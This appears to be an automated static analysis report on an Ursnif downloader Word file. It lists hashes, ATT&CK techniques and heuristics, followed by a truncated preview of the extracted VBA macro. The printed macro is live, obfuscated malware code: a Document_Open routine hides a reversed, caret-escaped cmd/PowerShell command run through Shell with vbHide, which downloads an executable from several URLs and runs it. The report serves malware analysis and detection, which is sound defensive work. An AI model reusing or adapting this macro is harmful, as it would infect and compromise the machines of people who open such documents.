ursnif — Office (OLE) malware analysis

Static analysis result for SHA-256 fdd034d3d2970af6…

MALICIOUS

Office (OLE)

64.5 KB Created: 2018-09-10 12:55:00 Authoring application: Microsoft Office Word First seen: 2018-10-07
MD5: eed67966f982c493e150201a8eabef22 SHA-1: 6fb6194314866a63cd567333b6c3da5064b77063 SHA-256: fdd034d3d2970af6cc5ceadbfcb1836475b186e3142a1fa20a354d04d4ba8bed
182 Risk Score

Malware Insights

ursnif · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function to execute arbitrary commands. ClamAV identifies the file as Doc.Downloader.URSNIF-6729855-3, strongly suggesting a downloader variant of the Ursnif family. The primary function of the macro appears to be downloading and executing a second-stage payload.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6116 bytes
SHA-256: 828787b460d5d3dfa734eee3a952028d0cc549c0ac79b9c6ea9593de757d6a53
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "EjjVhqDaJZHj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   Second "juLdXwomA" + "Vh" + "165012490" + "AUrMCRYhV"
   Second "1842" + "uFXwjb"
   Second "7879" + "8259"
Shell oBmYLzwQRb + iPDjUllQmhd + CwLCK, CStr(vbHide)
   Second "jktlHPru" + "5616"
End Sub



Attribute VB_Name = "vVcjTXTjfUulj"
Function oBmYLzwQRb()

On _
Error _
Resume _
Next
Second "LhFGdwcciYARcN" + "RHhTP"
SkaLlkPia = Format(Chr(16 + 5 + 8 + 18 + 52)) + "md " + "/V/" + Format(Chr(11 + 3 + 5 + 12 + 36)) + Format(Chr(5 + 1 + 2 + 5 + 21)) + "s" + "^e^t ^" + "d^A" + "=" + "^ "
Second "qWLGWEAP" + "hBEEVEh"
   Second "2288" + "pDz"
   Second "oI" + "HXIncu" + "7928" + "175122756"
lRvBGriS = " ^ ^ ^" + " " + "^ ^  " + "^ ^ ^  " + "^ " + "^ ^ " + "  ^" + "}}{^" + "h" + Format(Chr(16 + 5 + 8 + 18 + 52)) + "^" + "t^" + "a" + Format(Chr(16 + 5 + 8 + 18 + 52)) + "^}^"
Second "kRrFY" + "JdkaIV" + "CzYLLlAiw" + "T"
   Second "EjlOYL" + "8419" + "BivG" + "VWoikUN"
   Second "GTPDwQaTinhiGz" + "8846" + "8668" + "kRs"
   Second "4535" + "j" + "95902537" + "hdD"
   Second "476434881" + "jE"
OfiSN = ";^k" + "^" + "a^" + "er" + "^b^;^" + "PX^J^$ "
Second "nKPuPlRIuaiB" + "mCZ"
   Second "sjYDl" + "8888" + "fVF" + "bOA"
   Second "4900" + "KIkKiA" + "429016408" + "irUY"
   Second "221532748" + "128184254"
   Second "aslqVfLjDAht" + "GZ" + "WwJIvOw" + "7095"
klRLiiPTz = "^m" + "^et" + "^I^-e" + "^k^o" + "vnI^;)^" + "PX^" + "J^$" + "^ " + "^,Ur" + "r^" + "$(" + "^e" + "^l^"
Second "4994" + "L"
CTmNiUQV = "iF" + "^dao" + "^lnw" + "^o^D^" + ".l^" + "LN$^{yr" + "t{)^i" + "^jA$ " + "ni "
Second "203777138" + "vhR" + "Ew" + "hGuhCVD"
YOjLfDRB = "^Urr^$(" + "^h" + Format(Chr(16 + 5 + 8 + 18 + 52)) + "a^er" + "of;" + "'^" + "exe^" + ".^'^+^w" + "P^f$+" + "^'\^'" + "+" + Format(Chr(16 + 5 + 8 + 18 + 52)) + "il^b" + "up^:v"
Second "Oj" + "256947346" + "FP" + "458404671"
   Second "Swf" + "mkRAkHOrO" + "EXYHC" + "BhZucGCkBaRnz"
   Second "mabRawEOCMGVRX" + "zzSAN" + "iXiPsZJ" + "wJVTrFo"
   Second "tMu" + "lTUGluEzcKCaEo" + "Obtt" + "jOozYVCfqqOsE"
UnTGQ = "ne^$=P" + "X^J$" + "^" + ";'0^" + "2^6'^" + " = ^w^P" + "f^$^;)" + "'^" + "@^'(ti" + "l^pS." + "^'"
Second "i" + "smQPI"
   Second "9586" + "hwKqarqZAo"
   Second "uhkR" + "SzlGalXkW"
jsDdwutV = "^y" + "n^" + "7" + "/" + "^u" + "^a^.^g" + "ro^." + "sr^e^k" + Format(Chr(16 + 5 + 8 + 18 + 52))
Second "289472848" + "clZHz"
   Second "35237612" + "RS"
UtAJtwvSj = "^or" + "^dn^a^l" + "r^e" + "^mm^u^" + "s//" + "^:pt" + "^th@DW/" + "^gr^" + "o^" + ".ya^ws" + "gn"
Second "Bs" + "6691" + "OjzAMDjRz" + "12506600"
   Second "CqKRHR" + "Vio"
TpzwztYE = "^i^ke^h" + "^t//^" + ":^p" + "^t^t^" + "h@8^" + "H^A/mo" + Format(Chr(16 + 5 + 8 + 18 + 52)) + "^."
oBmYLzwQRb = SkaLlkPia + lRvBGriS + OfiSN + klRLiiPTz + CTmNiUQV + YOjLfDRB + UnTGQ + jsDdwutV + UtAJtwvSj + TpzwztYE
   Second "oGQOsDWZzt" + "T" + "358050075" + "ACNt"
   Second "OICRMMGmU" + "104595126"
   Second "72581059" + "jijiGBwp"
End Function
Function iPDjUllQmhd()

On _
Error _
Resume _
Next
Second "215931049" + "207698068" + "vC" + "AzQQfHlUkiGHYK"
   Second "FYcnSiG" + "i"
   Second "NksllHCi" + "vaYvhbjdkGD" + "129277600" + "323669784"
   Second "fhU" + "1265"
UdaKVE = "erotsh" + Format(Chr(16 + 5 + 8 + 18 + 52)) + "u^op^yr" + "l^ew" + "e^" + "j^e^" + "h^t.^w"
Second "290" + "290573140" + "su" + "9420"
   Second "H" + "dnDJKoi" + "2235" + "IwpUXj"
   Second "7329" + "jjN"
TknAw = "^w^w//" + ":p^tt" + "h@S^h^b" + "^WR" + "v^h" + "/"
Second "189805944" + "5197" + "PAH" + "LZO"
   Second "wVtpjJN" + "60727676" + "a" + "sWi"
   Second "zWrP" + "Qbjb"
   Second "Czr" + "NoAOq" + "9623" + "bsj"
okqdzZY = "^mo" + Format(Chr(16 + 5 + 8 + 18 + 52)) + "." + Format(Chr(16 + 5 + 8 + 18 + 52)) + "ih^p^" + "arig" + "i^d//" + ":ptt" +
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.